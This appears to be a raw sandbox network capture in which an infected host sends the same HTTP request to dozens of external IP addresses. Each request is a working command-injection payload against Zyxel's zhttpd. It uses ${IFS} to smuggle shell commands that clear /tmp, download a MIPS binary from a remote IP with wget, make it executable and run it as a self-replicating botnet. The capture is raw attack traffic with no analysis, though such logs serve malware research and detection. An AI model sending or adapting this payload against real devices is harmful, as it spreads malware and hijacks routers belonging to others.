                                                      Feb 2, 2024 06:36:12.049931049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9066192.168.2.1452672132.19.151.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.049956083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9067192.168.2.1435810171.83.45.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050000906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9068192.168.2.143984662.154.245.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050048113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9069192.168.2.1444622177.39.56.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050081968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9070192.168.2.1455716180.43.201.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050106049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9071192.168.2.145786275.166.208.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050151110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9072192.168.2.1459180168.90.24.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050201893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9073192.168.2.1454194222.185.140.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050239086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9074192.168.2.1453066200.248.174.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050285101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9075192.168.2.143838281.191.128.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050317049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9076192.168.2.145652425.71.131.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050340891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9077192.168.2.1434108181.232.111.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050386906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9078192.168.2.1439326175.18.172.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050419092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9079192.168.2.1435706122.26.249.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050463915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9080192.168.2.1449180181.122.101.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050497055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9081192.168.2.1457596171.199.99.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050527096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9082192.168.2.1436288183.191.221.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050561905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9083192.168.2.1440402128.243.119.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050614119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9084192.168.2.145323697.198.233.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050638914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9085192.168.2.1460838204.112.179.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050693989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9086192.168.2.1459668113.137.12.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050726891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9087192.168.2.146009285.151.150.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050755978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9088192.168.2.145575868.49.102.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050812006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9089192.168.2.1436806102.119.175.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050843000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9090192.168.2.145416899.182.42.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050879955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9091192.168.2.145086690.179.111.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050920963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9092192.168.2.1444322201.233.57.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.050945997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9093192.168.2.1441934137.27.152.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051000118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9094192.168.2.1447330207.132.209.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051038980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9095192.168.2.143663650.227.194.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051080942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9096192.168.2.1448106205.197.104.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051115036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9097192.168.2.145948063.120.25.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051167011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9098192.168.2.1455246145.160.192.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051230907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9099192.168.2.1453180186.50.104.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051268101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9100192.168.2.144224839.163.98.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051281929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9101192.168.2.1433234123.106.74.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051321983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9102192.168.2.1439002136.173.230.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051366091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9103192.168.2.1437482198.98.62.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051423073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9104192.168.2.1449162138.47.100.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051441908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9105192.168.2.143543479.109.115.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051493883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9106192.168.2.143425267.104.117.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051532984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9107192.168.2.14580909.137.18.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051573992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9108192.168.2.143295452.103.48.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051620960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9109192.168.2.1456196132.163.226.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051640987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9110192.168.2.144570238.143.56.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051686049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9111192.168.2.144157897.246.252.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051719904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9112192.168.2.143612437.253.207.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051768064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9113192.168.2.145670884.77.178.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051817894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9114192.168.2.145760436.138.202.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051865101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9115192.168.2.145719074.5.245.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051897049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9116192.168.2.145185890.151.97.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051934958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9117192.168.2.144562895.211.156.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.051978111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9118192.168.2.1451044126.77.130.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052006006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9119192.168.2.14469905.219.30.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052045107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9120192.168.2.144982425.119.117.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052073956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9121192.168.2.1455130117.64.68.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052133083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9122192.168.2.1452804152.247.105.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052180052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9123192.168.2.145716680.195.90.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052217007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9124192.168.2.145426475.118.5.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052259922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9125192.168.2.1439224191.80.36.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052308083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9126192.168.2.1458476207.181.121.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052359104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9127192.168.2.143691895.37.255.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.052388906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9128192.168.2.1460836216.54.196.222443
                                                      TimestampBytes transferredDirectionData
